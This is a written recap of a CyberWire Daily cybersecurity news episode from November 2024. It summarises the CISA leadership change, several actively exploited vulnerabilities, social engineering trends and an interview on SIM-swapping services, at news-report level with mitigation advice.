CyberWire Daily: A New Era for CISA Under Trump?

Release Date: November 18, 2024
Host: Dave Buettner
Guest: Rob Boyce, Global Lead for Cyber Resilience at Accenture

1. Leadership Transition at CISA

Jenn Easterly’s Departure

In a significant development, Jenn Easterly, the esteemed Director of the Cybersecurity and Infrastructure Security Agency (CISA), announced her resignation effective January 20, 2025, coinciding with the inauguration of President Elect Donald Trump. This transition is standard practice during a change in administration, as confirmed by a CISA spokesperson.

Easterly’s Legacy

Easterly, a West Point graduate and Rhodes Scholar, has been a pivotal figure in U.S. cybersecurity. With two decades in the U.S. Army, she played a crucial role in establishing U.S. Cyber Command following a major Department of Defense malware incident in 2008. Her career also spans senior positions at the NSA, the National Security Council, and Morgan Stanley. She assumed the role of CISA director after an eight-month vacancy following the dismissal of Chris Krebs in 2020.

Under her leadership, CISA advanced the Secure by Design initiatives, encouraging manufacturers to integrate security into their products from inception. She steered the agency through major cyberattacks, including persistent Chinese hacks targeting U.S. officials, and provided unwavering leadership during election cycles to uphold the integrity of election infrastructure. Additionally, Easterly issued guidance on emerging technologies such as artificial intelligence (AI) and quantum cryptography.

Future Uncertainties for CISA

Easterly’s departure raises questions about CISA’s future direction under the Trump administration. GOP critics have leveled allegations of censorship against CISA, coupled with proposed budget cuts, sparking concerns over the agency’s cybersecurity priorities moving forward. Senator Rand Paul, a vocal CISA critic, is poised to lead the Senate Homeland Security panel, adding to the uncertainty. Ohio Secretary of State Frank LaRose is reportedly a contender to succeed Easterly, but the agency’s path remains uncertain as these leadership changes unfold.

2. DHS Releases AI Framework for Critical Infrastructure

Roles and Responsibilities Framework

The Department of Homeland Security (DHS) has unveiled the Roles and Responsibilities Framework for Artificial Intelligence in Critical Infrastructure, a comprehensive guide aimed at securing AI development and deployment within essential sectors. This framework provides voluntary recommendations tailored for cloud providers, AI developers, critical infrastructure operators, civil society, and public sector organizations.

Key Focus Areas

1. Securing Environments: Emphasizes the protection of cloud supply chains and data centers while mandating the reporting of anomalies.
2. Responsible System Design: Encourages AI developers to adopt secure-by-design practices, address inherent biases, and ensure data privacy.
3. Data Governance: Highlights the importance of robust data management strategies to safeguard sensitive information.
4. Safe Deployment: Stresses the need for transparent AI usage and the implementation of fail-safes to prevent misuse.
5. Performance Monitoring: Advocates for continuous oversight to ensure AI systems operate within safe parameters.

Secretary Alejandro Mayorkas’s Insights

DHS Secretary Alejandro Mayorkas underscored the framework’s critical role in protecting vital services such as water and power. He described the framework as a “living document” that will evolve alongside advancements in AI technology, ensuring that cybersecurity measures remain proactive and adaptive to emerging threats.

3. Palo Alto Networks’ Critical Zero-Day Vulnerability Exploited

Vulnerability Details

Palo Alto Networks has confirmed the active exploitation of a critical zero-day vulnerability in its firewall products, particularly affecting management interfaces exposed to the internet. Rated 9.3 out of 10 in severity, this flaw allows unauthenticated remote command execution, posing a significant threat until a patch is deployed.

Mitigation Strategies

Until a patch is available, Palo Alto Networks advises users to restrict access to management interfaces strictly to internal, trusted IP addresses. Implementing this measure reduces the vulnerability’s severity to 7.5 but necessitates diligent monitoring for any suspicious activities. The company has observed malicious activities from specific IP addresses, including potential misuse of third-party VPN services, and has detected malicious code on affected devices.

Additional Vulnerabilities

Beyond the primary zero-day, Palo Alto Networks disclosed other vulnerabilities in its Expedition Migration tool, including OS command and SQL injection flaws that could expose sensitive firewall configurations. Users are urged to apply available fixes promptly to secure their systems.

4. Sextortion Scams Exploiting Microsoft 365 Admin Portal

Method of Exploitation

Cybercriminals are leveraging Microsoft's 365 admin portal to dispatch sextortion emails that appear legitimate, effectively bypassing traditional spam filters. These scams typically claim that hackers have accessed compromising images or videos of victims and demand cryptocurrency payments to prevent their release.

Attack Vector

The perpetrators exploit the Microsoft Message Center’s Share feature, which is intended to forward notifications with personal messages. Although the Share field is limited to 1,000 characters, attackers manipulate browser development tools to input longer messages, circumventing server-side restrictions. Microsoft is currently investigating these exploits but has not yet implemented fixes.

Impact

Sextortion scams have been prevalent since 2018, causing significant distress to recipients. The abuse of legitimate platforms like Microsoft 365 exacerbates the issue, making it easier for scammers to appear trustworthy and evade detection.

5. China-Based APT41 Exploits Fortinet’s Windows VPN Zero-Day

Deep Data Malware Framework

Chinese Advanced Persistent Threat group APT41, also known as Brazen Bamboo and associated with the LightSpy malware, is actively exploiting a zero-day vulnerability in Fortinet's Windows VPN client. This exploitation facilitates the theft of credentials and the deployment of the Deep Data malware framework.

Capabilities of Deep Data

Deep Data employs plugins to extract sensitive information from browsers, communication applications, and password managers. Additionally, it can record audio through the system’s microphone, providing comprehensive surveillance capabilities.

Vulnerability Status

The zero-day vulnerability, reported to Fortinet in July, remains unpatched and lacks an official CVE identifier. The exploit allows APT41 to conduct extensive surveillance and data exfiltration, particularly targeting journalists, politicians, and activists in Southeast Asia.

Malware Evolution

A new Windows variant of LightSpy has been identified, showcasing APT41’s expanding multi-platform surveillance strategies. The persistence and adaptability of APT41 underline the escalating sophistication of cyber threats emanating from state-sponsored groups.

6. EPA Reports Vulnerabilities in U.S. Drinking Water Systems

Scope of Vulnerabilities

The Environmental Protection Agency’s Office of Inspector General (EPA OIG) has identified cybersecurity vulnerabilities in over 300 U.S. drinking water systems, serving approximately 110 million people. These vulnerabilities pose significant risks, including service disruptions, denial-of-service (DoS) attacks, and the compromise of customer data.

Severity of Issues

• Critical or High Severity: Found in 97 systems serving 27 million individuals.
• Medium and Low Severity: Detected in 211 systems covering 83 million people.

Common Vulnerabilities

The identified weaknesses span various domains including email security, IT hygiene, and threat detection mechanisms. Notably, open portals on some systems expose them to potential exploitation.

EPA’s Response and Concerns

The OIG emphasized that exploiting these vulnerabilities could lead to catastrophic damage to water infrastructure. Furthermore, the EPA currently lacks a dedicated cybersecurity incident reporting system, relying instead on CISA for coordination—which raises concerns about the efficiency and effectiveness of emergency response and mitigation efforts.

7. Critical Authentication Bypass in WordPress Plugin

Vulnerability Overview

A severe authentication bypass vulnerability has been discovered in the Really Simple Security plugin for WordPress, which is utilized by over 4 million websites. This plugin offers SSL configuration, two-factor authentication (2FA), and security monitoring.

Technical Details

The flaw originates from improper handling of the login nonce parameter in the plugin's 2FA REST API. When login nonce verification fails, the plugin erroneously authenticates users based solely on their user ID, allowing attackers to gain administrative access to vulnerable sites.

Exploitation and Impact

Given the nature of this vulnerability, it can be exploited at scale using automated scripts, posing a widespread threat to WordPress sites globally. Recognizing the severity, Wordfence discovered the vulnerability on November 6 and released fixes earlier this month. Web administrators and hosting providers are urged to update the plugin immediately to mitigate the risk.

8. Rise in Click Fix Social Engineering Techniques

Emerging Threat: Click Fix

Researchers at Proofpoint have identified a significant uptick in the Click Fix social engineering technique. This method manipulates users into executing malicious PowerShell scripts by masquerading them as solutions to fabricated technical problems.

Operational Mechanics

Click Fix exploits trust by presenting fake error messages or software update prompts, prompting users to copy and run PowerShell commands that deliver malware. Recent campaigns have utilized fake CAPTCHA verifications, GitHub notifications, and spoofed emails from platforms like Microsoft Word and ChatGPT.

Malicious Payloads

The payloads delivered through Click Fix include:

• Asyncrat
• NET Support
• Lumastealer
• Xworm

These malicious scripts bypass traditional security controls by exploiting human error and the desire for users to independently resolve perceived issues.

Prevalence and Evolution

Initially linked to campaigns by threat actors TA571 and Clearfake, Click Fix has now been adopted by a broader range of financially motivated and espionage-focused attackers. This evolution underscores the dynamic nature of social engineering strategies and the necessity for robust user education and awareness.

Mitigation Strategies

Organizations are advised to:

• Train users to recognize deceptive tactics.
• Avoid manually executing unverified PowerShell commands.
• Implement advanced threat detection systems to monitor for suspicious script activities.

9. Swatting Conviction: Consequences and Implications

Case Overview

An 18-year-old named Alan Filion has pleaded guilty to orchestrating over 375 fake emergency threats, a practice known as swatting. Between 2022 and 2024, Filion targeted religious and educational institutions, government officials, and individuals across the United States, beginning his activities at the age of 16.

Methodology

Swatting involves falsely reporting emergencies to prompt SWAT team responses, often resulting in chaos, property damage, and endangered lives. Filion utilized social media platforms to advertise swatting services for a fee, boasting about his ability to cause police detentions and searches based on fabricated crimes.

Legal Consequences

Filion faces up to five years in prison for each of four felony counts. His sentencing is scheduled for February, highlighting the legal system’s stance against such malicious activities.

Broader Implications

This case underscores the growing threat of swatting, emphasizing the need for law enforcement and cybersecurity professionals to develop strategies to prevent and respond to such incidents effectively.

10. Guest Interview: Rob Boyce on SIM Swapping Services Targeting Telcos

Introduction

Rob Boyce, Global Lead for Cyber Resilience at Accenture, joined the CyberWire Intel Briefing to discuss the emerging trend of SIM swapping services targeting telecommunications companies.

Emerging SIM Swapping Threats

Rob Boyce (14:08): “SIM swapping as you said, it's nothing new. But what we're seeing now is super interesting—threat actors offering services for resetting passwords or MFA bypass via SIM swap through what we believe is an API exploit.”

API Exploits and Increased Vulnerability

Historically, SIM swapping required insider access or sophisticated social engineering. However, Boyce highlights a novel approach where threat actors are exploiting APIs to facilitate mass SIM swaps without direct human manipulation.

Service Offerings and Pricing

The threat actor is monetizing this exploit by offering:

1. One-Time SIM Swap: Purchasing a single number for $4,000 to $7,000.
2. Full Rights to the Exploit: Granting broader access for approximately $15,000.

Boyce anticipates these prices will fluctuate as the exploit becomes more widespread and competitive.

Impact on Telcos and Security Measures

This unprecedented method allows for rapid and large-scale SIM swaps, posing substantial risks to telecommunications providers and their customers. Boyce emphasizes the need for Multi-Factor Authentication (MFA) improvements, noting that SMS-based MFA is particularly vulnerable to such attacks.

Future of Authentication

Rob Boyce (21:16): “MFA is maturing, and the future lies in passwordless authentication with standards like FIDO2 or PassKey, which replace passwords with cryptographic keys, enhancing security and user experience.”

Recommendations

Organizations should:

• Transition from SMS-based MFA to more secure, passwordless authentication methods.
• Implement robust MFA solutions that are resilient against API exploits and social engineering.
• Continuously monitor and update security protocols to mitigate evolving threats.

Conclusion

Boyce underscores the critical importance of evolving authentication practices to safeguard against advanced SIM swapping techniques, advocating for a shift towards more secure and user-friendly authentication standards.

11. Caller ID Desk: FTC’s Battle Against Scam Calls

Progress in Reducing Scam Calls

The Federal Trade Commission (FTC) reports a 50% reduction in complaints about scam and nuisance calls since 2021, marking a significant victory for the agency’s ongoing efforts. In 2024, the FTC received 2 million complaints, primarily focused on medical and prescription scams and imposter calls.

Types of Scams

• Robocalls: Accounted for 53% of complaints.
• Human Scammers: Made up 37%, often involving unsolicited sales attempts.

FTC’s Initiatives

The FTC is not complacent despite the progress. It has introduced new rules and initiatives such as the Impersonation Rule and Operation Stop Scam to intensify crackdowns on both scammers and the businesses that profit from fraudulent activities. Additionally, the FTC is addressing the rising threat of deepfake phone scams through a voice cloning challenge, recognizing the increasing sophistication of AI-driven scams.

Sam Levine’s Statement

Sam Levine, Head of the FTC’s Bureau of Consumer Protection: “Illegal calls remain a scourge. But we're making progress, with scams still costing consumers over $1 billion last year. There's plenty more work ahead.”

Consumer Advice

Levine advises consumers to remain vigilant, suggesting that unknown numbers should be sent directly to voicemail to prevent falling victim to these ongoing scams.

Conclusion

The November 18, 2024 episode of CyberWire Daily provided a comprehensive overview of pivotal cybersecurity developments, from leadership changes within CISA to emerging threats like API-driven SIM swapping and sophisticated social engineering techniques. Guest insights from Rob Boyce highlighted the evolving landscape of authentication security, while the FTC's achievements in reducing scam calls offered a glimpse of progress in combating consumer fraud. As cybersecurity threats continue to adapt and expand, the episode underscored the necessity for continuous vigilance, advanced security measures, and proactive policy frameworks to safeguard critical infrastructure and protect consumers.

Notable Quotes:

• Rob Boyce (17:36): “This is the first time that we're actually seeing a real exploit being used against six major US telcos, and the credibility of this claim is pretty high at this point.”

• Rob Boyce (21:16): “The future of MFA is really passwordless authentication with the adoption of open standards like FIDO2 or PassKey, which replace passwords with cryptographic keys.”

• Sam Levine (Caller ID Desk): “Illegal calls remain a scourge. But we're making progress, with scams still costing consumers over $1 billion last year.”

Produced by: Liz Stokes
Mixer: Trey Hester
Music and Sound Design: Elliot Peltzman
Executive Producer: Jennifer Iban
Executive Editor: Brandon Karp
President: Simone Petrella
Publisher: Peter Kilpie
Host: Dave Buettner

For more detailed information on today’s stories, visit CyberWire Daily Briefing. To stay ahead in the rapidly evolving world of cybersecurity, subscribe to the CyberWire Daily and ensure you never miss an update.